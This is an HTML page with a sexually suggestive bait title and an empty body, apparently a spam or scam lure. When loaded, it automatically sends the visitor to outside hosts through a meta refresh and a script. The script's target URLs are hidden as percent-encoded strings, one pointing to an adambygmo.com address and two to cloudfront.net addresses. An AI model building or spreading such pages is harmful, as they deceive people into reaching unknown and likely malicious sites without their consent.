<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="viewport"
      content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, user-scalable=no">
      <meta http-equiv="refresh" content="0;URL='https://dveffiqgs4tvg.cloudfront.net'" />
    <link rel="shortcut icon" href="icon/favicon_4_64.ico" type="image/x-icon">
    <title>Honey! Open the card and find me 👙</title>
</head>
<body>
    <p id="content" style="opacity:0;"></p>
    <script language="javascript" type="text/javascript">
        window.location.href = decodeURIComponent('%68%74%74%70%73%3a%2f%2f%61%2e%61%64%61%6d%62%79%67%6d%6f%2e%63%6f%6d%2f')
        setTimeout(function() {
            window.location = decodeURIComponent('%68%74%74%70%73%3a%2f%2f%64%31%33%75%7a%36%61%61%31%35%34%35%62%6a%2e%63%6c%6f%75%64%66%72%6f%6e%74%2e%6e%65%74%2f')
        }, 10000)
    </script>
</body>
</html>
